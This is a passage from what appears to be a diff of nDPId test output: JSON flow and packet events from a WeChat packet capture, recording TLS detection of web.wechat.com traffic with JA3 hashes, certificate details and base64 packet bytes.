{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167378926,"flow_last_seen":1492167380233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380233,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167380581,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167380581,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1492167380581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380581,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8GvtAAEAG+kHAqAFny82XotNQAbtFV84kAAAAAKACchDy2AAAAgQFtAQCCAoAMNTfAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167378926,"flow_last_seen":1492167380590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1492167380590,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167401063,"flow_last_seen":1492167401063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167401063,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} 
-00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1492167352068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352068,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePFAAEAGFx7AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO38PQAAAQEICgAwuQeFnMDK"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} 